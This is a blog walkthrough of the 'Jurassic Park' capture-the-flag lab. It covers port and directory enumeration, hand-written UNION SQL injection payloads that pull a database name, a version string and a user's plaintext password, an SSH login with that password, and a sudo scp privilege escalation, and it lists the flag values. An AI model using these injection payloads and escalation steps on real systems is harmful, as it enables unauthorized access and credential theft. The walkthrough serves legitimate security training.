18 January 2022

Pentesting Fun Stuff

following the cyber security path…

Jurassic Park

Port scanning

Starting with a fast port scan to see which ports are open.

root@lab:~/THM/JurassicPark# nmap -T4 -sS -p- jurassic.park
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-30 20:40 CEST
Nmap scan report for jurassic.park (10.10.10.170)
Host is up (0.036s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 20.65 seconds

Then more options specific targeted on the open ports to get more information.

root@lab:~/THM/JurassicPark# nmap -T4 -sS -sV -sC -p22,80 jurassic.park
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-30 20:40 CEST
Nmap scan report for jurassic.park (10.10.10.170)
Host is up (0.032s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9a:fb:a3:13:72:b3:53:59:94:b8:16:02:d1:d2:7e:32 (RSA)
|   256 76:32:44:a0:39:24:97:44:4f:43:7b:01:39:fb:cd:84 (ECDSA)
|_  256 33:7e:04:8e:db:96:06:af:20:90:a2:81:3d:45:db:8f (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Jarassic Park
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.04 seconds

Not much information and a misspelled Jarassic Park as title of the website.

On the main page is again the misspelled name……maybe it’s not misspelled but a hint for JAR files?

In the source code there is a comment:

<!-- <video src="assets/theme.mp3" autoplay> -->

Some web enumeration shows a folder.

root@lab:~/THM/JurassicPark# dirsearch -u http://jurassic.park -e php -x 404 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 207627

Error Log: /opt/tools/dirsearch/logs/errors-19-09-30_20-43-13.log

Target: http://jurassic.park

[20:43:13] Starting: 
[20:43:13] 200 -    1KB - /
[20:43:14] 301 -  315B  - /assets  ->  http://jurassic.park/assets/
[20:43:33] 200 -   65B  - /delete
[20:48:11] 403 -  301B  - /server-status

Task Completed
root@lab:~/THM/JurassicPark# curl jurassic.park/delete
New priv esc for Ubunut??

Change MySQL password on main system!

There is also a shop with a parameter in the URI. When replacing the number with a single quote, I get a very nice result.

And at the bottom the text: YOU DIDN’T SAY THE MAGIC WORD! Try SqlMap.. I dare you..

But when entering a double quote I get a better result, namely an SQL error.

Before continuing with the SQLi option, I first want to check out the parameter first.

root@lab:~/THM/JurassicPark# for i in {1..25}; do echo -e "id=$i\n\n" && curl -s http://jurassic.park/item.php?id=$i | grep -A 10 '<body>' && echo -e '\n------------------------------------------------\n'; done
id=1


<body>
  <section class='black text-center'>
    <a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br>
    <h1>Gold Package</h1></br>
  </section>
  <div class="container text-center">
    <h3>Price: $500000</h3></br>
    <div class="alert alert-primary" role="alert"><b>4</b> of these packages have been sold in the last hour.</div></br>
    <h4>Childen under 5 can attend free of charge and will be eaten for free. This package includes a dinosaur lunch, tour around the park AND a FREE dinosaur egg from a dino of your choice!</h4>
    </br><h4>Order yours quick by calling us!</h4>


------------------------------------------------

id=2


<body>
  <section class='black text-center'>
    <a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br>
    <h1>Bronse Package</h1></br>
  </section>
  <div class="container text-center">
    <h3>Price: $250000</h3></br>
    <div class="alert alert-primary" role="alert"><b>11</b> of these packages have been sold in the last hour.</div></br>
    <h4>Children under 5 can attend free of charge and eat free. This package includes a tour around the park and a dinosaur lunch! Try different dino's and rate the best tasting one!</h4>
    </br><h4>Order yours quick by calling us!</h4>


------------------------------------------------

id=3


<body>
  <section class='black text-center'>
    <a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br>
    <h1>Basic Package</h1></br>
  </section>
  <div class="container text-center">
    <h3>Price: $100000</h3></br>
    <div class="alert alert-primary" role="alert"><b>27</b> of these packages have been sold in the last hour.</div></br>
    <h4>Children under 5 can attend for free and eat free. This package will include a basic tour around the park in the brand new automated cars!</h4>
    </br><h4>Order yours quick by calling us!</h4>


------------------------------------------------

id=4


id=5


<body>
  <section class='black text-center'>
    <a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br>
    <h1>Development Package</h1></br>
  </section>
  <div class="container text-center">
    <h3>Price: $0</h3></br>
    <div class="alert alert-primary" role="alert"><b>0</b> of these packages have been sold in the last hour.</div></br>
    <h4>Dennis, why have you blocked these characters: ' # DROP - username @ ---- Is this our WAF now?</h4>
    </br><h4>Order yours quick by calling us!</h4>


------------------------------------------------

id=6


id=7


id=8

So there is some useful information when entering id=5.

Ok….so let’s recap what we have so far.

There is a parameter which is vulnerable to SQLi, but there are some defensive settings in place. I have running a sqlmap with WAF tampering options running in the background, but it has not gotten anything viable. So until I can let sqlmap do the dumping of the database, I have to do some manual labor myself.

SQL Injection

#1 What is the SQL database called which is serving the shop information?
root@lab:~/THM/JurassicPark# curl -s "http://jurassic.park/item.php?id=5%20UNION%20SELECT%201,database(),3,4,5" | \grep '<h1>' | cut -d '>' -f2 | cut -d '<' -f 1
park Package
#2 How many columns does the table have?

That’s clear from the previous command: 5

#3 Whats the system version?
root@lab:~/THM/JurassicPark# curl -s "http://jurassic.park/item.php?id=5%20UNION%20SELECT%201,version(),3,4,5" | \grep '<h1>' | cut -d '>' -f2 | cut -d '<' -f 1
5.7.25-0ubuntu0.16.04.2 Package
#4 What is dennis’ password?

Because there is a filter on ‘username’ I need to guess the table and column names a bit. After a little while I get a password.

root@lab:~/THM/JurassicPark# curl -s "http://jurassic.park/item.php?id=5%20UNION%20SELECT%201,password,3,4,5%20from%20users" | \grep '<h1>' | cut -d '>' -f2 | cut -d '<' -f 1
ih8dinos Package
#5 Locate and get the first flag contents.
root@lab:~/THM/JurassicPark# ssh dennis@jurassic.park
The authenticity of host 'jurassic.park (10.10.150.111)' can't be established.
ECDSA key fingerprint is SHA256:/qDcDUmBukzaryWv8jvW3cafeByJkfebR0UcVxD/wVE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'jurassic.park,10.10.150.111' (ECDSA) to the list of known hosts.
dennis@jurassic.park's password: 
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-1072-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  Get cloud support with Ubuntu Advantage Cloud Guest:
    http://www.ubuntu.com/business/services/cloud

62 packages can be updated.
45 updates are security updates.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

dennis@ip-10-10-150-111:~$ ls -lah
total 44K
drwxr-xr-x 3 dennis dennis 4.0K Sep 30 20:20 .
drwxr-xr-x 4 root   root   4.0K Feb 16  2019 ..
-rw------- 1 dennis dennis 1001 Feb 16  2019 .bash_history
-rw-r--r-- 1 dennis dennis  220 Feb 16  2019 .bash_logout
-rw-r--r-- 1 dennis dennis 3.7K Feb 16  2019 .bashrc
drwx------ 2 dennis dennis 4.0K Sep 30 20:20 .cache
-rw-rw-r-- 1 dennis dennis   93 Feb 16  2019 flag1.txt
-rw-r--r-- 1 dennis dennis  655 Feb 16  2019 .profile
-rw-rw-r-- 1 dennis dennis   32 Feb 16  2019 test.sh
-rw------- 1 dennis dennis 4.3K Feb 16  2019 .viminfo
dennis@ip-10-10-150-111:~$ cat flag1.txt 
Congrats on finding the first flag.. But what about the rest? :O

b89f2d69c56b9981ac92dd267f
#6 Whats the contents of the second flag?
dennis@ip-10-10-150-111:~$ find / -iname "flag*" -type f 2>/dev/null
/home/dennis/flag1.txt
/sys/devices/pnp0/00:06/tty/ttyS0/flags
/sys/devices/vif-0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/usr/src/linux-aws-headers-4.4.0-1072/scripts/coccinelle/locks/flags.cocci
/usr/src/linux-headers-4.4.0-1072-aws/include/config/zone/dma/flag.h
/boot/grub/fonts/flagTwo.txt
dennis@ip-10-10-150-111:~$ cat /boot/grub/fonts/flagTwo.txt
96ccd6b429be8c9a4b501c7a0b117b0a
#7 Whats the contents of the third flag?
dennis@ip-10-10-150-111:~$ cat .bash_history 
Flag3:b4973bbc9053807856ec815db25fb3f1
#8 Whats the contents of the fourth flag?
dennis@ip-10-10-150-111:~$ cat .viminfo
> /tmp/flagFour.txt

But there is no /tmp/flagFour.txt. When reading the discord chatroom, this is confirmed by the creator of the room.

#9 Whats the contents of the fifth flag?
dennis@ip-10-10-150-111:~$ sudo -l
Matching Defaults entries for dennis on ip-10-10-150-111.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dennis may run the following commands on ip-10-10-150-111.eu-west-1.compute.internal:
    (ALL) NOPASSWD: /usr/bin/scp
dennis@ip-10-10-150-111:~$ ls -ld /usr/bin/scp
-rwxr-xr-x 1 root root 80016 Nov  5  2018 /usr/bin/scp
dennis@ip-10-10-150-111:~$ cat test.sh
#!/bin/bash
cat /root/flag5.txt

dennis@ip-10-10-150-111:~$ sudo scp -r /root/flag5.txt /tmp
dennis@ip-10-10-150-111:~$ ls -lah /tmp
total 40K
drwxrwxrwt  9 root root 4.0K Sep 30 20:25 .
drwxr-xr-x 23 root root 4.0K Sep 30 19:46 ..
-rw-r--r--  1 root root   33 Sep 30 20:25 flag5.txt
drwxrwxrwt  2 root root 4.0K Sep 30 19:46 .font-unix
drwxrwxrwt  2 root root 4.0K Sep 30 19:46 .ICE-unix
drwx------  3 root root 4.0K Sep 30 19:46 systemd-private-eed490776f0c401db680b0c43a10f612-systemd-timesyncd.service-02qwMJ
drwxrwxrwt  2 root root 4.0K Sep 30 19:46 .Test-unix
drwxrwxrwt  2 root root 4.0K Sep 30 19:46 .X11-unix
drwxrwxrwt  2 root root 4.0K Sep 30 19:46 .XIM-unix
dennis@ip-10-10-150-111:~$ cat /tmp/flag5.txt
2a7074e491fcacc7eeba97808dc5e2ec

 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.